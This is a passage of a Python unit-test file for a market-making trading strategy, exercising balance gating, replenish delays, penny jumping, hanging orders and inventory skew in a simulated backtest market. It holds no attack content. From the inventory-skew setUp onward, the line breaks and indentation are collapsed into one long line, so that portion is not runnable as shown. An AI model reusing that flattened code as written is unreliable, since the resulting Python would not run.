        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1)
        self.assertEqual(1, len(self.maker_order_fill_logger.event_log))
        maker_fill: OrderFilledEvent = self.maker_order_fill_logger.event_log[0]
        self.assertEqual(TradeType.SELL, maker_fill.trade_type)
        self.assertAlmostEqual(101, maker_fill.price)
        self.assertAlmostEqual(1.0, maker_fill.amount)
        # NOTE(review): same as the equal-size test above — these lines touch
        # self.strategy (removed from the clock) and re-run an already-reached
        # timestamp; presumably a copy-paste slip, verify.
        self.strategy.cancel_order(self.market_info, first_bid_order.client_order_id)
        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1)
        self.assertEqual(0, len(self.strategy.active_bids))
        self.assertEqual(0, len(self.strategy.active_asks))
        self.maker_order_fill_logger.clear()

    def test_balance_for_multiple_equal_orders(self):
        """Balance gating in equal-size multi-level mode (0/5 -> 0/0 -> 5/5 orders)."""
        self.clock.remove_iterator(self.strategy)
        self.clock.add_iterator(self.multi_order_equal_strategy)
        self.maker_market.set_balance("WETH", 0)
        end_ts = self.start_timestamp + self.clock_tick_size
        self.clock.backtest_til(end_ts)
        self.assertEqual(0, len(self.multi_order_equal_strategy.active_bids))
        self.assertEqual(5, len(self.multi_order_equal_strategy.active_asks))
        self.maker_market.set_balance("COINALPHA", 0)
        end_ts += self.clock_tick_size
        self.clock.backtest_til(end_ts)
        self.assertEqual(0, len(self.multi_order_equal_strategy.active_bids))
        self.assertEqual(0, len(self.multi_order_equal_strategy.active_asks))
        self.maker_market.set_balance("COINALPHA", 500)
        self.maker_market.set_balance("WETH", 5000)
        end_ts += self.clock_tick_size
        self.clock.backtest_til(end_ts)
        self.assertEqual(5, len(self.multi_order_equal_strategy.active_bids))
        self.assertEqual(5, len(self.multi_order_equal_strategy.active_asks))

    def test_balance_for_multiple_staggered_orders(self):
        """Balance gating in staggered-size multi-level mode (0/5 -> 0/0 -> 5/5 orders)."""
        self.clock.remove_iterator(self.strategy)
        self.clock.add_iterator(self.multi_order_staggered_strategy)
        self.maker_market.set_balance("WETH", 0)
        end_ts = self.start_timestamp + self.clock_tick_size
        self.clock.backtest_til(end_ts)
        self.assertEqual(0, len(self.multi_order_staggered_strategy.active_bids))
        self.assertEqual(5, len(self.multi_order_staggered_strategy.active_asks))
        self.maker_market.set_balance("COINALPHA", 0)
        end_ts += self.clock_tick_size
        self.clock.backtest_til(end_ts)
        self.assertEqual(0, len(self.multi_order_staggered_strategy.active_bids))
        self.assertEqual(0, len(self.multi_order_staggered_strategy.active_asks))
        self.maker_market.set_balance("COINALPHA", 500)
        self.maker_market.set_balance("WETH", 5000)
        end_ts += self.clock_tick_size
        self.clock.backtest_til(end_ts)
        self.assertEqual(5, len(self.multi_order_staggered_strategy.active_bids))
        self.assertEqual(5, len(self.multi_order_staggered_strategy.active_asks))

    def test_replenish_delay(self):
        """A filled order is only replenished after the configured filled-order delay."""
        self.clock.remove_iterator(self.strategy)
        self.clock.add_iterator(self.delayed_placement_strategy)
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        self.assertEqual(1, len(self.delayed_placement_strategy.active_bids))
        self.assertEqual(1, len(self.delayed_placement_strategy.active_asks))
        ask_order: LimitOrder = self.delayed_placement_strategy.active_asks[0][1]
        self.simulate_limit_order_fill(self.maker_market, ask_order)
        # Ask is filled and due to delay is not replenished immediately
        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size)
        self.assertEqual(1, len(self.maker_order_fill_logger.event_log))
        self.assertEqual(1, len(self.delayed_placement_strategy.active_bids))
        self.assertEqual(0, len(self.delayed_placement_strategy.active_asks))
        # Orders are placed after replenish delay
        self.clock.backtest_til(self.start_timestamp + 4 * self.clock_tick_size)
        self.assertEqual(1, len(self.delayed_placement_strategy.active_bids))
        self.assertEqual(1, len(self.delayed_placement_strategy.active_asks))
        # Prices are not adjusted according to filled price as per settings
        bid_order: LimitOrder = self.delayed_placement_strategy.active_bids[0][1]
        ask_order: LimitOrder = self.delayed_placement_strategy.active_asks[0][1]
        self.assertEqual(Decimal("99"), bid_order.price)
        self.assertEqual(Decimal("101"), ask_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)
        self.maker_order_fill_logger.clear()

    def test_replenish_delay_multiple_fills(self):
        """Two fills within the delay window still produce one combined replenishment."""
        self.clock.remove_iterator(self.strategy)
        self.clock.add_iterator(self.delayed_placement_strategy)
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        self.assertEqual(1, len(self.delayed_placement_strategy.active_bids))
        self.assertEqual(1, len(self.delayed_placement_strategy.active_asks))
        ask_order: LimitOrder = self.delayed_placement_strategy.active_asks[0][1]
        bid_order: LimitOrder = self.delayed_placement_strategy.active_bids[0][1]
        self.simulate_limit_order_fill(self.maker_market, ask_order)
        # Ask is filled and due to delay is not replenished immediately
        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size)
        self.assertEqual(1, len(self.maker_order_fill_logger.event_log))
        self.assertEqual(1, len(self.delayed_placement_strategy.active_bids))
        self.assertEqual(0, len(self.delayed_placement_strategy.active_asks))
        self.simulate_limit_order_fill(self.maker_market, bid_order)
        # Even if both orders are filled, orders are not placed due to delay
        self.clock.backtest_til(self.start_timestamp + 3 * self.clock_tick_size)
        self.assertEqual(0, len(self.delayed_placement_strategy.active_bids))
        self.assertEqual(0, len(self.delayed_placement_strategy.active_asks))
        # Orders are placed after replenish delay
        self.clock.backtest_til(self.start_timestamp + 4 * self.clock_tick_size)
        self.assertEqual(1, len(self.delayed_placement_strategy.active_bids))
        self.assertEqual(1, len(self.delayed_placement_strategy.active_asks))
        # Prices are not adjusted according to filled price as per settings
        bid_order: LimitOrder = self.delayed_placement_strategy.active_bids[0][1]
        ask_order: LimitOrder = self.delayed_placement_strategy.active_asks[0][1]
        self.assertEqual(Decimal("99"), bid_order.price)
        self.assertEqual(Decimal("101"), ask_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)
        self.maker_order_fill_logger.clear()

    def test_penny_jumping_feature(self):
        """order_optimization (penny jumping) places quotes one tick inside the book top."""
        self.clock.remove_iterator(self.strategy)
        self.clock.remove_iterator(self.maker_market)
        # A separate market with a coarse (4-step) book so the top of book sits at 98 / 102.
        self.maker_market_2: BacktestMarket = BacktestMarket()
        self.maker_data_2: MockOrderBookLoader = MockOrderBookLoader(*self.maker_trading_pairs)
        self.maker_data_2.set_balanced_order_book(mid_price=self.mid_price, min_price=1, max_price=200, price_step_size=4, volume_step_size=10)
        self.maker_market_2.add_data(self.maker_data_2)
        self.maker_market_2.set_balance("COINALPHA", 500)
        self.maker_market_2.set_balance("WETH", 5000)
        self.maker_market_2.set_balance("QETH", 500)
        self.maker_market_2.set_quantization_param(
            QuantizationParams(
                self.maker_trading_pairs[0], 6, 6, 6, 6
            )
        )
        self.market_info: MarketTradingPairTuple = MarketTradingPairTuple(
            *([self.maker_market_2] + self.maker_trading_pairs)
        )
        logging_options: int = (PureMarketMakingStrategyV2.OPTION_LOG_ALL &
                                (~PureMarketMakingStrategyV2.OPTION_LOG_NULL_ORDER_SIZE))
        self.penny_jumping_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2(
            [self.market_info],
            filter_delegate=self.filter_delegate,
            pricing_delegate=self.constant_pricing_delegate,
            sizing_delegate=self.constant_sizing_delegate,
            order_optimization_enabled=True,
            order_refresh_time=900,
            filled_order_delay=80,
            hanging_orders_enabled=True,
            logging_options=logging_options
        )
        self.clock.add_iterator(self.penny_jumping_strategy)
        self.clock.add_iterator(self.maker_market_2)
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        self.assertEqual(1, len(self.penny_jumping_strategy.active_bids))
        self.assertEqual(1, len(self.penny_jumping_strategy.active_asks))
        bid_order: LimitOrder = self.penny_jumping_strategy.active_bids[0][1]
        ask_order: LimitOrder = self.penny_jumping_strategy.active_asks[0][1]
        # Top bid is 98 and suggested price is 99 from pricing proposal
        # With penny jumping, bid price is just one above top bid
        self.assertEqual(Decimal("98.0001"), bid_order.price)
        # Top ask is 102 and suggested price is 101 from pricing proposal
        # With penny jumping, ask price is just one below top ask
        self.assertEqual(Decimal("101.999"), ask_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)


class PureMarketMakingV2HangingOrderUnitTest(unittest.TestCase):
    """Backtest-clock tests for the hanging-orders and filled-order-delay behavior."""

    # One-hour simulated window shared by all tests in this class.
    start: pd.Timestamp = pd.Timestamp("2019-01-01", tz="UTC")
    end: pd.Timestamp = pd.Timestamp("2019-01-01 01:00:00", tz="UTC")
    start_timestamp: float = start.timestamp()
    end_timestamp: float = end.timestamp()
    # [trading pair, base asset, quote asset]
    maker_trading_pairs: List[str] = ["COINALPHA-WETH", "COINALPHA", "WETH"]

    def setUp(self):
        """Build a balanced mock book, funded backtest market, and the strategy variants."""
        self.clock_tick_size = 1
        self.clock: Clock = Clock(ClockMode.BACKTEST, self.clock_tick_size, self.start_timestamp, self.end_timestamp)
        self.maker_market: BacktestMarket = BacktestMarket()
        self.maker_data: MockOrderBookLoader = MockOrderBookLoader(*self.maker_trading_pairs)
        self.mid_price = 100
        self.bid_threshold = 0.01
        self.ask_threshold = 0.01
        self.order_refresh_time = 30
        self.maker_data.set_balanced_order_book(mid_price=self.mid_price, min_price=1, max_price=200, price_step_size=1, volume_step_size=10)
        self.constant_pricing_delegate = ConstantSpreadPricingDelegate(Decimal(self.bid_threshold), Decimal(self.ask_threshold))
        self.constant_sizing_delegate = ConstantSizeSizingDelegate(Decimal("1.0"))
        self.filter_delegate = PassThroughFilterDelegate()
        self.maker_market.add_data(self.maker_data)
        self.maker_market.set_balance("COINALPHA", 500)
        self.maker_market.set_balance("WETH", 5000)
        self.maker_market.set_balance("QETH", 500)
        self.maker_market.set_quantization_param(
            QuantizationParams(
                self.maker_trading_pairs[0], 6, 6, 6, 6
            )
        )
        self.market_info: MarketTradingPairTuple = MarketTradingPairTuple(
            *([self.maker_market] + self.maker_trading_pairs)
        )
        logging_options: int = (PureMarketMakingStrategyV2.OPTION_LOG_ALL &
                                (~PureMarketMakingStrategyV2.OPTION_LOG_NULL_ORDER_SIZE))
        # Single-level strategy with hanging orders enabled (cancel at 5% spread drift).
        self.hanging_orders_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2(
            [self.market_info],
            filter_delegate=self.filter_delegate,
            pricing_delegate=self.constant_pricing_delegate,
            sizing_delegate=self.constant_sizing_delegate,
            order_refresh_time=4,
            filled_order_delay=8,
            hanging_orders_enabled=True,
            logging_options=logging_options,
            hanging_orders_cancel_pct=0.05
        )
        self.multiple_order_pricing_delegate = ConstantMultipleSpreadPricingDelegate(
            bid_spread=Decimal(self.bid_threshold),
            ask_spread=Decimal(self.ask_threshold),
            order_level_spread=Decimal("0.01"),
            order_levels=Decimal("5")
        )
        # Step size 0 makes all five levels the same size.
        self.equal_sizing_delegate = StaggeredMultipleSizeSizingDelegate(
            order_start_size=Decimal("1.0"),
            order_step_size=Decimal("0"),
            order_levels=Decimal("5")
        )
        # Five-level strategy with hanging orders enabled (cancel at 10% spread drift).
        self.multi_orders_hanging_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2(
            [self.market_info],
            filter_delegate=self.filter_delegate,
            pricing_delegate=self.multiple_order_pricing_delegate,
            sizing_delegate=self.equal_sizing_delegate,
            order_refresh_time=4,
            filled_order_delay=8,
            hanging_orders_enabled=True,
            logging_options=logging_options,
            hanging_orders_cancel_pct=0.1
        )
        # Same configurations but without hanging orders, for pure replenish-delay tests.
        self.replenish_delay_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2(
            [self.market_info],
            filter_delegate=self.filter_delegate,
            pricing_delegate=self.constant_pricing_delegate,
            sizing_delegate=self.constant_sizing_delegate,
            order_refresh_time=4,
            filled_order_delay=8,
            logging_options=logging_options
        )
        self.replenish_delay_multiple_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2(
            [self.market_info],
            filter_delegate=self.filter_delegate,
            pricing_delegate=self.multiple_order_pricing_delegate,
            sizing_delegate=self.equal_sizing_delegate,
            order_refresh_time=4,
            filled_order_delay=8,
            logging_options=logging_options
        )
        self.logging_options = logging_options
        self.clock.add_iterator(self.maker_market)
        self.maker_order_fill_logger: EventLogger = EventLogger()
        self.cancel_order_logger: EventLogger = EventLogger()
        self.maker_market.add_listener(MarketEvent.OrderFilled, self.maker_order_fill_logger)
        self.maker_market.add_listener(MarketEvent.OrderCancelled, self.cancel_order_logger)

    def test_hanging_orders_feature(self):
        """The surviving side of a fill hangs past refresh, then is cancelled on spread drift."""
        strategy = self.hanging_orders_strategy
        self.clock.add_iterator(strategy)
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        self.assertEqual(1, len(strategy.active_bids))
        self.assertEqual(1, len(strategy.active_asks))
        bid_order: LimitOrder = strategy.active_bids[0][1]
        PureMarketMakingV2UnitTest.simulate_limit_order_fill(self.maker_market, bid_order)
        # Bid is filled and due to delay is not replenished immediately
        # Ask order is now hanging but is active
        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size)
        self.assertEqual(1, len(self.maker_order_fill_logger.event_log))
        self.assertEqual(0, len(strategy.active_bids))
        self.assertEqual(1, len(strategy.active_asks))
        self.assertEqual(1, len(strategy.hanging_order_ids))
        hanging_order_id = strategy.hanging_order_ids[0]
        # At order_refresh_time (4 seconds), hanging order remains.
        self.clock.backtest_til(self.start_timestamp + 5 * self.clock_tick_size)
        self.assertEqual(0, len(strategy.active_bids))
        self.assertEqual(1, len(strategy.active_asks))
        # At filled_order_delay (8 seconds), a new set of bid and ask orders (one each) is created
        self.clock.backtest_til(self.start_timestamp + 10 * self.clock_tick_size)
        self.assertEqual(1, len(strategy.active_bids))
        self.assertEqual(2, len(strategy.active_asks))
        self.assertIn(hanging_order_id, [order.client_order_id for market, order in strategy.active_asks])
        PureMarketMakingV2UnitTest.simulate_order_book_widening(self.maker_data.order_book, 80, 100)
        # As book bids moving lower, the ask hanging order price spread is now more than the hanging_orders_cancel_pct
        # Hanging order is canceled and removed from the active list
        self.clock.backtest_til(self.start_timestamp + 11 * self.clock_tick_size)
        self.assertEqual(1, len(strategy.active_bids))
        self.assertEqual(1, len(strategy.active_asks))
        self.assertNotIn(strategy.active_asks[0][1].client_order_id, strategy.hanging_order_ids)
        # Prices are not adjusted according to filled price as per settings
        bid_order: LimitOrder = strategy.active_bids[0][1]
        ask_order: LimitOrder = strategy.active_asks[0][1]
        self.assertEqual(Decimal("99"), bid_order.price)
        self.assertEqual(Decimal("101"), ask_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)
        self.maker_order_fill_logger.clear()

    def test_hanging_orders_multiple_orders_mode(self):
        """All five opposite-side orders hang after a fill; drift prunes some of them."""
        strategy = self.multi_orders_hanging_strategy
        self.clock.add_iterator(strategy)
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        self.assertEqual(5, len(strategy.active_bids))
        self.assertEqual(5, len(strategy.active_asks))
        ask_order: LimitOrder = strategy.active_asks[0][1]
        PureMarketMakingV2UnitTest.simulate_limit_order_fill(self.maker_market, ask_order)
        # Ask is filled and due to delay is not replenished immediately
        # Bid orders are now hanging and active
        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size)
        self.assertEqual(1, len(self.maker_order_fill_logger.event_log))
        self.assertEqual(5, len(strategy.active_bids))
        self.assertEqual(4, len(strategy.active_asks))
        self.assertEqual(5, len(strategy.hanging_order_ids))
        # At order_refresh_time (4 seconds), hanging order remains, asks all got canceled
        self.clock.backtest_til(self.start_timestamp + 5 * self.clock_tick_size)
        self.assertEqual(5, len(strategy.active_bids))
        self.assertEqual(0, len(strategy.active_asks))
        # At filled_order_delay (8 seconds), new sets of bid and ask orders are created
        self.clock.backtest_til(self.start_timestamp + 10 * self.clock_tick_size)
        self.assertEqual(10, len(strategy.active_bids))
        self.assertEqual(5, len(strategy.active_asks))
        # Check all hanging order ids are indeed in active bids list
        self.assertTrue(all(h in [order.client_order_id for market, order in strategy.active_bids]
                            for h in strategy.hanging_order_ids))
        PureMarketMakingV2UnitTest.simulate_order_book_widening(self.maker_data.order_book, 100, 120)
        # As order book asks moving higher, some hanging ask orders price spreads are now more than
        # the hanging_orders_cancel_pct
        self.clock.backtest_til(self.start_timestamp + 11 * self.clock_tick_size)
        self.assertEqual(6, len(strategy.active_bids))
        self.assertEqual(5, len(strategy.active_asks))
        # Prices are not adjusted according to filled price as per settings
        bid_order: LimitOrder = strategy.active_bids[0][1]
        ask_order: LimitOrder = strategy.active_asks[0][1]
        self.assertEqual(Decimal("99"), bid_order.price)
        self.assertEqual(Decimal("101"), ask_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)
        self.maker_order_fill_logger.clear()

    def test_replenish_delay_strategy(self):
        """Without hanging orders, both sides are cancelled after a fill, then re-placed after the delay."""
        strategy = self.replenish_delay_strategy
        self.clock.add_iterator(strategy)
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        self.assertEqual(1, len(strategy.active_bids))
        self.assertEqual(1, len(strategy.active_asks))
        ask_order: LimitOrder = strategy.active_asks[0][1]
        # At 2nd second, simulate ask order filled
        PureMarketMakingV2UnitTest.simulate_limit_order_fill(self.maker_market, ask_order)
        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size)
        # At cancel_wait_time, both bid and ask are canceled and not replenished immediately
        self.clock.backtest_til(self.start_timestamp + 5 * self.clock_tick_size)
        self.assertEqual(1, len(self.maker_order_fill_logger.event_log))
        self.assertEqual(0, len(strategy.active_bids))
        self.assertEqual(0, len(strategy.active_asks))
        # New orders are placed after filled_order_delay
        self.clock.backtest_til(self.start_timestamp + 10 * self.clock_tick_size)
        self.assertEqual(1, len(strategy.active_bids))
        self.assertEqual(1, len(strategy.active_asks))
        # Prices are not adjusted according to filled price as per settings
        bid_order: LimitOrder = strategy.active_bids[0][1]
        ask_order: LimitOrder = strategy.active_asks[0][1]
        self.assertEqual(Decimal("99"), bid_order.price)
        self.assertEqual(Decimal("101"), ask_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)
        self.maker_order_fill_logger.clear()

    def test_replenish_delay_multiple_orders_mode(self):
        """Multi-level variant: a fill cancels all levels; all five per side return after the delay."""
        strategy = self.replenish_delay_multiple_strategy
        self.clock.add_iterator(strategy)
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        self.assertEqual(5, len(strategy.active_bids))
        self.assertEqual(5, len(strategy.active_asks))
        bid_order: LimitOrder = strategy.active_bids[0][1]
        # At 2nd second, simulate bid order filled
        PureMarketMakingV2UnitTest.simulate_limit_order_fill(self.maker_market, bid_order)
        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size)
        # Bid is filled and due to delay is not replenished immediately, all outstandings got canceled
        self.clock.backtest_til(self.start_timestamp + 5 * self.clock_tick_size)
        self.assertEqual(1, len(self.maker_order_fill_logger.event_log))
        self.assertEqual(0, len(strategy.active_bids))
        self.assertEqual(0, len(strategy.active_asks))
        # New orders are placed after filled_order_delay
        self.clock.backtest_til(self.start_timestamp + 10 * self.clock_tick_size)
        self.assertEqual(5, len(strategy.active_bids))
        self.assertEqual(5, len(strategy.active_asks))
        self.maker_order_fill_logger.clear()


class PureMarketMakingV2InventorySkewUnitTest(unittest.TestCase):
    """Backtest-clock tests for inventory-skew behavior (setUp continues past this chunk)."""

    start: pd.Timestamp = pd.Timestamp("2019-01-01", tz="UTC")
    end: pd.Timestamp = pd.Timestamp("2019-01-01 01:00:00", tz="UTC")
    start_timestamp: float = start.timestamp()
    end_timestamp: float = end.timestamp()
    maker_trading_pairs: List[str] = ["COINALPHA-WETH", "COINALPHA", "WETH"]

    def setUp(self):
        self.clock_tick_size = 1
        self.clock: Clock = Clock(ClockMode.BACKTEST, self.clock_tick_size, self.start_timestamp, self.end_timestamp)
        self.maker_market: BacktestMarket = BacktestMarket()
        self.maker_data: MockOrderBookLoader = MockOrderBookLoader(*self.maker_trading_pairs)
        self.mid_price = 100
        self.bid_threshold = 0.01
        self.ask_threshold = 0.01
        self.order_refresh_time = 30
        self.maker_data.set_balanced_order_book(mid_price=self.mid_price, min_price=1, max_price=200, price_step_size=1, volume_step_size=10)
        self.filter_delegate = PassThroughFilterDelegate()
        self.constant_pricing_delegate = \
ConstantSpreadPricingDelegate(Decimal(self.bid_threshold), Decimal(self.ask_threshold)) self.multiple_order_strategy_pricing_delegate = ConstantMultipleSpreadPricingDelegate( bid_spread=Decimal(self.bid_threshold), ask_spread=Decimal(self.ask_threshold), order_level_spread=Decimal("0.01"), order_levels=5 ) self.inventory_skew_single_size_sizing_delegate = InventorySkewSingleSizeSizingDelegate( order_size=Decimal("1"), inventory_target_base_percent=Decimal("0.9"), inventory_range_multiplier=Decimal("5") ) self.inventory_skew_multiple_size_sizing_delegate = InventorySkewMultipleSizeSizingDelegate( order_start_size=Decimal("1.0"), order_step_size=Decimal("0.5"), order_levels=5, inventory_target_base_percent=Decimal("0.9"), inventory_range_multiplier=Decimal("0.5") ) self.maker_market.add_data(self.maker_data) self.maker_market.set_balance("COINALPHA", 500) self.maker_market.set_balance("WETH", 5000) self.maker_market.set_balance("QETH", 500) self.maker_market.set_quantization_param( QuantizationParams( self.maker_trading_pairs[0], 6, 6, 6, 6 ) ) self.market_info: MarketTradingPairTuple = MarketTradingPairTuple( *( [self.maker_market] + self.maker_trading_pairs ) ) logging_options: int = (PureMarketMakingStrategyV2.OPTION_LOG_ALL & (~PureMarketMakingStrategyV2.OPTION_LOG_NULL_ORDER_SIZE)) self.inventory_skew_single_order_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, sizing_delegate=self.inventory_skew_single_size_sizing_delegate, pricing_delegate=self.constant_pricing_delegate, order_refresh_time=45, filled_order_delay=0, logging_options=logging_options ) self.inventory_skew_single_order_strategy_delayed_fill: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, sizing_delegate=self.inventory_skew_single_size_sizing_delegate, pricing_delegate=self.constant_pricing_delegate, order_refresh_time=45, filled_order_delay=15, 
logging_options=logging_options ) self.inventory_skew_multiple_order_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, sizing_delegate=self.inventory_skew_multiple_size_sizing_delegate, pricing_delegate=self.multiple_order_strategy_pricing_delegate, order_refresh_time=45, logging_options=logging_options ) self.logging_options = logging_options self.clock.add_iterator(self.maker_market) self.maker_order_fill_logger: EventLogger = EventLogger() self.cancel_order_logger: EventLogger = EventLogger() self.maker_market.add_listener(MarketEvent.OrderFilled, self.maker_order_fill_logger) self.maker_market.add_listener(MarketEvent.OrderCancelled, self.cancel_order_logger) def simulate_maker_market_trade(self, is_buy: bool, quantity: float): maker_trading_pair: str = self.maker_trading_pairs[0] order_book: OrderBook = self.maker_market.get_order_book(maker_trading_pair) trade_event: OrderBookTradeEvent = OrderBookTradeEvent( maker_trading_pair, self.clock.current_timestamp, TradeType.BUY if is_buy else TradeType.SELL, (self.mid_price * (1 - self.bid_threshold - 0.01) if not is_buy else self.mid_price * (1 + self.ask_threshold + 0.01)), quantity ) order_book.apply_trade(trade_event) def test_inventory_skew_single_order_strategy(self): self.clock.add_iterator(self.inventory_skew_single_order_strategy) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(1, len(self.inventory_skew_single_order_strategy.active_bids)) self.assertEqual(1, len(self.inventory_skew_single_order_strategy.active_asks)) first_bid_order: LimitOrder = self.inventory_skew_single_order_strategy.active_bids[0][1] first_ask_order: LimitOrder = self.inventory_skew_single_order_strategy.active_asks[0][1] self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("101"), first_ask_order.price) self.assertEqual(Decimal("0.5"), first_bid_order.quantity) self.assertEqual(Decimal("1.5"), 
first_ask_order.quantity) self.simulate_maker_market_trade(True, 5.0) self.assertEqual(1, len(self.inventory_skew_single_order_strategy.active_bids)) self.assertEqual(0, len(self.inventory_skew_single_order_strategy.active_asks)) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) self.assertEqual(1, len(self.maker_order_fill_logger.event_log)) maker_fill: OrderFilledEvent = self.maker_order_fill_logger.event_log[0] self.assertEqual(TradeType.SELL, maker_fill.trade_type) self.assertAlmostEqual(101, maker_fill.price) self.assertAlmostEqual(Decimal("1.5"), Decimal(str(maker_fill.amount)), places=4) self.clock.backtest_til(self.start_timestamp + 3 * self.clock_tick_size + 1) self.assertEqual(1, len(self.inventory_skew_single_order_strategy.active_bids)) self.assertEqual(1, len(self.inventory_skew_single_order_strategy.active_asks)) first_bid_order: LimitOrder = self.inventory_skew_single_order_strategy.active_bids[0][1] first_ask_order: LimitOrder = self.inventory_skew_single_order_strategy.active_asks[0][1] self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("101"), first_ask_order.price) self.assertEqual(Decimal("0.651349"), first_bid_order.quantity) self.assertEqual(Decimal("1.34865"), first_ask_order.quantity) def test_inventory_skew_single_order_strategy_delayed_fill(self): self.clock.add_iterator(self.inventory_skew_single_order_strategy_delayed_fill) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size + 1) self.assertEqual(1, len(self.inventory_skew_single_order_strategy_delayed_fill.active_bids)) self.assertEqual(1, len(self.inventory_skew_single_order_strategy_delayed_fill.active_asks)) first_bid_order: LimitOrder = self.inventory_skew_single_order_strategy_delayed_fill.active_bids[0][1] first_ask_order: LimitOrder = self.inventory_skew_single_order_strategy_delayed_fill.active_asks[0][1] self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("101"), 
first_ask_order.price) self.assertEqual(Decimal("0.5"), first_bid_order.quantity) self.assertEqual(Decimal("1.5"), first_ask_order.quantity) self.simulate_maker_market_trade(True, 5.0) self.assertEqual(1, len(self.inventory_skew_single_order_strategy_delayed_fill.active_bids)) self.assertEqual(0, len(self.inventory_skew_single_order_strategy_delayed_fill.active_asks)) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) self.assertEqual(1, len(self.maker_order_fill_logger.event_log)) maker_fill: OrderFilledEvent = self.maker_order_fill_logger.event_log[0] self.assertEqual(TradeType.SELL, maker_fill.trade_type) self.assertAlmostEqual(101, maker_fill.price) self.assertAlmostEqual(Decimal("1.5"), Decimal(str(maker_fill.amount)), places=4) self.clock.backtest_til(self.start_timestamp + 3 * self.clock_tick_size + 1) # Order is not replenished till replenish time self.assertEqual(1, len(self.inventory_skew_single_order_strategy_delayed_fill.active_bids)) self.assertEqual(0, len(self.inventory_skew_single_order_strategy_delayed_fill.active_asks)) first_bid_order: LimitOrder = self.inventory_skew_single_order_strategy_delayed_fill.active_bids[0][1] self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("0.5"), first_bid_order.quantity) self.clock.backtest_til(self.start_timestamp + 60 * self.clock_tick_size + 1) self.assertEqual(1, len(self.inventory_skew_single_order_strategy_delayed_fill.active_bids)) self.assertEqual(1, len(self.inventory_skew_single_order_strategy_delayed_fill.active_asks)) first_bid_order: LimitOrder = self.inventory_skew_single_order_strategy_delayed_fill.active_bids[0][1] first_ask_order: LimitOrder = self.inventory_skew_single_order_strategy_delayed_fill.active_asks[0][1] # Price does not change based on filled price self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("101"), first_ask_order.price) self.assertEqual(Decimal("0.651349"), first_bid_order.quantity) 
self.assertEqual(Decimal("1.34865"), first_ask_order.quantity) def test_inventory_skew_multiple_order_strategy(self): self.clock.add_iterator(self.inventory_skew_multiple_order_strategy) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(5, len(self.inventory_skew_multiple_order_strategy.active_bids)) self.assertEqual(5, len(self.inventory_skew_multiple_order_strategy.active_asks)) first_bid_order: LimitOrder = self.inventory_skew_multiple_order_strategy.active_bids[0][1] first_ask_order: LimitOrder = self.inventory_skew_multiple_order_strategy.active_asks[0][1] self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("101"), first_ask_order.price) self.assertEqual(Decimal("0.5"), first_bid_order.quantity) self.assertEqual(Decimal("1.5"), first_ask_order.quantity) last_bid_order: LimitOrder = self.inventory_skew_multiple_order_strategy.active_bids[-1][1] last_ask_order: LimitOrder = self.inventory_skew_multiple_order_strategy.active_asks[-1][1] last_bid_price = Decimal(99 * (1 - 0.01) ** 4).quantize(Decimal("0.001")) last_ask_price = Decimal(101 * (1 + 0.01) ** 4).quantize(Decimal("0.001")) self.assertAlmostEqual(last_bid_price, last_bid_order.price, 3) self.assertAlmostEqual(last_ask_price, last_ask_order.price, 3) self.assertEqual(Decimal("1.5"), last_bid_order.quantity) self.assertEqual(Decimal("4.5"), last_ask_order.quantity) self.simulate_maker_market_trade(True, 5.0) self.assertEqual(5, len(self.inventory_skew_multiple_order_strategy.active_bids)) self.assertEqual(4, len(self.inventory_skew_multiple_order_strategy.active_asks)) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) self.assertEqual(1, len(self.maker_order_fill_logger.event_log)) maker_fill: OrderFilledEvent = self.maker_order_fill_logger.event_log[0] self.assertEqual(TradeType.SELL, maker_fill.trade_type) 